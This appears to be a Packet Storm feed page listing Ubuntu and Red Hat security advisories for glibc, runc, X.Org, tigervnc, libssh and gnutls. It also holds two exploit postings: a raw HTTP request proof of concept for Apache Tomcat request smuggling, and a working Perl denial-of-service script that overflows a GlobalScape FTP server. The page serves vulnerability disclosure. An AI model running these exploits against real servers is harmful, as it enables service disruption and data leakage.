Ubuntu Security Notice 6620-1 - It was discovered that the GNU C Library incorrectly handled the syslog function call. A local attacker could use this issue to execute arbitrary code and possibly escalate privileges.

    ==========================================================================Ubuntu Security Notice USN-6620-1February 01, 2024glibc vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 23.10Summary:GNU C Library could be made to crash or run programs as an administratorif it handled a specially crafted request.Software Description:- glibc: GNU C LibraryDetails:It was discovered that the GNU C Library incorrectly handled the syslog()function call. A local attacker could use this issue to execute arbitrarycode and possibly escalate privileges.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 23.10:   libc6                           2.38-1ubuntu6.1After a standard system update you need to reboot your computer to make allthe necessary changes.References:   https://ubuntu.com/security/notices/USN-6620-1   CVE-2023-6246, CVE-2023-6779, CVE-2023-6780Package Information:   https://launchpad.net/ubuntu/+source/glibc/2.38-1ubuntu6.1

Ubuntu Security Notice USN-6620-1

Ubuntu Security Notice 6619-1 - Rory McNamara discovered that runC did not properly manage internal file descriptor while managing containers. An attacker could possibly use this issue to obtain sensitive information or bypass container restrictions.

==========================================================================  
Ubuntu Security Notice USN-6619-1  
January 31, 2024

runc vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)

Summary:

runC could be made to expose sensitive information or allow to escape  
contianers.

Software Description:  
- runc: Open Container Project

Details:

Rory McNamara discovered that runC did not properly manage internal file  
descriptor while managing containers. An attacker could possibly use this  
issue to obtain sensitive information or bypass container restrictions.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10:  
  runc                            1.1.7-0ubuntu2.2

Ubuntu 22.04 LTS:  
  runc                            1.1.7-0ubuntu1~22.04.2

Ubuntu 20.04 LTS:  
  runc                            1.1.7-0ubuntu1~20.04.2

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
  runc                            1.1.4-0ubuntu1~18.04.2+esm1

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6619-1  
  CVE-2024-21626

Package Information:  
  https://launchpad.net/ubuntu/+source/runc/1.1.7-0ubuntu2.2  
  https://launchpad.net/ubuntu/+source/runc/1.1.7-0ubuntu1~22.04.2  
  https://launchpad.net/ubuntu/+source/runc/1.1.7-0ubuntu1~20.04.2

Ubuntu Security Notice USN-6619-1

Ubuntu Security Notice 6587-4 - USN-6587-1 fixed vulnerabilities in X.Org X Server. The fix was incomplete resulting in a possible regression. This update fixes the problem. Jan-Niklas Sohn discovered that the X.Org X Server incorrectly handled memory when processing the DeviceFocusEvent and ProcXIQueryPointer APIs. An attacker could possibly use this issue to cause the X Server to crash, obtain sensitive information, or execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6587-4  
February 01, 2024

xorg-server, xwayland regression  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)

Summary:

A regression was fixed in X.Org X Server.

Software Description:  
- xorg-server: X.Org X11 server

Details:

USN-6587-1 fixed vulnerabilities in X.Org X Server. The fix was incomplete  
resulting in a possible regression. This update fixes the problem.

Original advisory details:

 Jan-Niklas Sohn discovered that the X.Org X Server incorrectly handled  
 memory when processing the DeviceFocusEvent and ProcXIQueryPointer APIs. An  
 attacker could possibly use this issue to cause the X Server to crash,  
 obtain sensitive information, or execute arbitrary code. (CVE-2023-6816)

 Jan-Niklas Sohn discovered that the X.Org X Server incorrectly handled  
 reattaching to a different master device. An attacker could use this issue  
 to cause the X Server to crash, leading to a denial of service, or possibly  
 execute arbitrary code. (CVE-2024-0229)

 Olivier Fourdan and Donn Seeley discovered that the X.Org X Server  
 incorrectly labeled GLX PBuffers when used with SELinux. An attacker could  
 use this issue to cause the X Server to crash, leading to a denial of  
 service. (CVE-2024-0408)

 Olivier Fourdan discovered that the X.Org X Server incorrectly handled  
 the curser code when used with SELinux. An attacker could use this issue to  
 cause the X Server to crash, leading to a denial of service.  
 (CVE-2024-0409)

 Jan-Niklas Sohn discovered that the X.Org X Server incorrectly handled  
 memory when processing the XISendDeviceHierarchyEvent API. An attacker  
 could possibly use this issue to cause the X Server to crash, or execute  
 arbitrary code. (CVE-2024-21885)

 Jan-Niklas Sohn discovered that the X.Org X Server incorrectly handled  
 devices being disabled. An attacker could possibly use this issue to cause  
 the X Server to crash, or execute arbitrary code. (CVE-2024-21886)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
  xserver-xorg-core               2:1.19.6-1ubuntu4.15+esm5  
  xwayland                        2:1.19.6-1ubuntu4.15+esm5

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
  xserver-xorg-core               2:1.18.4-0ubuntu0.12+esm10  
  xwayland                        2:1.18.4-0ubuntu0.12+esm10

After a standard system update you need to reboot your computer to make all  
the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6587-4  
  https://ubuntu.com/security/notices/USN-6587-1  
  https://launchpad.net/bugs/2051536

Ubuntu Security Notice USN-6587-4

Apache Tomcat suffers from a client-side de-sync vulnerability via HTTP request smuggling. Apache Tomcat versions 8.5.7 through 8.5.63 and 9.0.0-M11 through 9.0.43 are vulnerable.

    # Exploit Title: CVE-2024-21733 Apache Tomcat HTTP Request Smuggling# Date: 1/31/2024# Exploit Author: xer0dayz# Vendor Homepage: https://tomcat.apache.org/# Software Link: https://tomcat.apache.org/# Version: 8.5.7 to 8.5.63 or 9.0.44 or later# CVE : CVE-2024-21733## Description:Apache Tomcat from 8.5.7 through 8.5.63, from 9.0.0-M11 through 9.0.43 are vulnerable to client-side de-sync attacks.Client-side de-sync (CSD) vulnerabilities occur when a web server fails to correctly process the Content-Length of POST requests. By exploiting this behavior, an attacker can force a victim's browser to de-synchronize its connection with the website, causing sensitive data to be smuggled from the server and/or client connections.## Remediation:Users are recommended to upgrade to version 8.5.64 onwards or 9.0.44 onwards, which contain a fix for the issue.## Credit:This vulnerability was reported responsibly to the Tomcat security team by xer0dayz from Sn1perSecurity LLC.## History:2024-01-19 Original advisory## Full Security Advisory: https://lists.apache.org/thread/h9bjqdd0odj6lhs2o96qgowcc6hb0cfz## Full Write-Up: https://sn1persecurity.com/wordpress/cve-2024-21733-apache-tomcat-http-request-smuggling/## PoC/Exploit:POST / HTTP/1.1Host: hostnameSec-Ch-Ua: "Chromium";v="119", "Not?A_Brand";v="24"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Linux"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Priority: u=0, iConnection: keep-aliveContent-Length: 6Content-Type: application/x-www-form-urlencodedXSent with [Proton Mail](https://proton.me/) secure email.

Apache Tomcat 8.5.63 / 9.0.43 HTTP Response Smuggling

GlobalScape Secure FTP Server version 3.0 remote denial of service exploit.

    #!/usr/bin/perluse strict;use IO::Socket;print "GlobalScape Secure FTP Server 3.0 - Denial of Service     \n";my $payload = "\x41\x42\x0a\x00"x147;my $buffer = "\x41"x2043 . "\x41\x42\x43\x00" . "\x42"x36 . $payload;my $sock = IO::Socket::INET->new(PeerAddr => '192.168.0.10', PeerPort => 21, Proto => 'tcp');if ($sock) {    print "[+] Connected to FTP server\n";    print "[+] Sending Username\n";    print $sock "USER anonymous\r\n";    print "[+] Sending Password\n";    print $sock "PASS anonymous\r\n";    print "[+] Sending payload to exploit \nn";    print $sock $buffer . "\r\n";    print "[+] Exploit!\n";    close($sock);} else {    print "Can't connect to FTP\n";}

GlobalScape Secure FTP Server 3.0 Denial Of Service

Red Hat Security Advisory 2024-0629-03 - An update for tigervnc is now available for Red Hat Enterprise Linux 7. Issues addressed include a buffer overflow vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0629.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: tigervnc security update  
Advisory ID:        RHSA-2024:0629-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0629  
Issue date:         2024-01-31  
Revision:           03  
CVE Names:          CVE-2023-6816  
====================================================================

Summary: 

An update for tigervnc is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Virtual Network Computing (VNC) is a remote display system which allows users to view a computing desktop environment not only on the machine where it is running, but from anywhere on the Internet and from a wide variety of machine architectures. TigerVNC is a suite of VNC servers and clients.

Security Fix(es):

* xorg-x11-server: Heap buffer overflow in DeviceFocusEvent and ProcXIQueryPointer (CVE-2023-6816)

* xorg-x11-server: reattaching to different master device may lead to out-of-bounds memory access (CVE-2024-0229)

* xorg-x11-server: heap buffer overflow in XISendDeviceHierarchyEvent (CVE-2024-21885)

* xorg-x11-server: heap buffer overflow in DisableDevice (CVE-2024-21886)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-6816

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2256540  
https://bugzilla.redhat.com/show_bug.cgi?id=2256542  
https://bugzilla.redhat.com/show_bug.cgi?id=2256690  
https://bugzilla.redhat.com/show_bug.cgi?id=2257691

Red Hat Security Advisory 2024-0629-03

Red Hat Security Advisory 2024-0628-03 - An update for libssh is now available for Red Hat Enterprise Linux 8.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0628.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: libssh security updateAdvisory ID:        RHSA-2024:0628-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0628Issue date:         2024-01-31Revision:           03CVE Names:          CVE-2023-48795====================================================================Summary: An update for libssh is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:libssh is a library which implements the SSH protocol. It can be used to implement client and server applications.Security Fix(es):* ssh: Prefix truncation attack on Binary Packet Protocol (BPP) (CVE-2023-48795)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-48795References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2254210

Red Hat Security Advisory 2024-0628-03

Red Hat Security Advisory 2024-0627-03 - An update for gnutls is now available for Red Hat Enterprise Linux 8.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0627.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: gnutls security updateAdvisory ID:        RHSA-2024:0627-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0627Issue date:         2024-01-31Revision:           03CVE Names:          CVE-2024-0553====================================================================Summary: An update for gnutls is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The gnutls packages provide the GNU Transport Layer Security (GnuTLS) library, which implements cryptographic algorithms and protocols such as SSL, TLS, and DTLS.Security Fix(es):* gnutls: incomplete fix for CVE-2023-5981 (CVE-2024-0553)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-0553References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2258412

Red Hat Security Advisory 2024-0627-03

Red Hat Security Advisory 2024-0626-03 - An update for tigervnc is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include a buffer overflow vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0626.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: tigervnc security update  
Advisory ID:        RHSA-2024:0626-03  
Product:            Red Hat Enterprise Linux  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0626  
Issue date:         2024-01-31  
Revision:           03  
CVE Names:          CVE-2023-6816  
====================================================================

Summary: 

An update for tigervnc is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Virtual Network Computing (VNC) is a remote display system which allows users to view a computing desktop environment not only on the machine where it is running, but from anywhere on the Internet and from a wide variety of machine architectures. TigerVNC is a suite of VNC servers and clients.

Security Fix(es):

* xorg-x11-server: Heap buffer overflow in DeviceFocusEvent and ProcXIQueryPointer (CVE-2023-6816)

* xorg-x11-server: reattaching to different master device may lead to out-of-bounds memory access (CVE-2024-0229)

* xorg-x11-server: heap buffer overflow in XISendDeviceHierarchyEvent (CVE-2024-21885)

* xorg-x11-server: heap buffer overflow in DisableDevice (CVE-2024-21886)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-6816

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2256540  
https://bugzilla.redhat.com/show_bug.cgi?id=2256542  
https://bugzilla.redhat.com/show_bug.cgi?id=2256690  
https://bugzilla.redhat.com/show_bug.cgi?id=2257691

Red Hat Security Advisory 2024-0626-03

Red Hat Security Advisory 2024-0625-03 - An update for libssh is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0625.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: libssh security updateAdvisory ID:        RHSA-2024:0625-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0625Issue date:         2024-01-31Revision:           03CVE Names:          CVE-2023-48795====================================================================Summary: An update for libssh is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:libssh is a library which implements the SSH protocol. It can be used to implement client and server applications.Security Fix(es):* ssh: Prefix truncation attack on Binary Packet Protocol (BPP) (CVE-2023-48795)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-48795References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2254210

Source

Packet Storm